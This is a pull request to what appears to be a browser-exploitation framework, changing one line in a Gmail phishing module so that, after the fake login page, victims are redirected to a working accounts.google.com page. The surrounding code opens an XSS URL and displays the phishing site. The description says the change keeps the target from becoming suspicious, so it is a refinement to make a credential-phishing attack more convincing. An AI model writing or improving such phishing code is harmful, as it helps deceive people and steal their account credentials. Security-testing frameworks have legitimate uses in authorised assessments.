### PR TITLE
Fixed Gmail Phishing by updating https://accounts.google.com/ServiceLogin to https://accounts.google.com/

### DIFF
--- a/modules/social_engineering/gmail_phishing/command.js
+++ b/modules/social_engineering/gmail_phishing/command.js
@@ -34,7 +34,7 @@ function redirect(){
         window.open(theXssUrl);
         window.focus();
     }
-    window.location = "https://accounts.google.com/ServiceLoginAuth";
+    window.location = "https://accounts.google.com/";
 }
 
 function displayPhishingSite(){


### PR DESCRIPTION
# Pull Request

Thanks for submitting a PR! Please fill in this template where appropriate:

## Category
  Module

## Feature/Issue Description
**Q:** Gmail Phishing automatically led to https://accounts.google.com/ServiceLogin which is returns a 404 not found error
**A:** I basically changed it to https://accounts.google.com/, it no longer returns a 404 error and the target should not be suspicious...
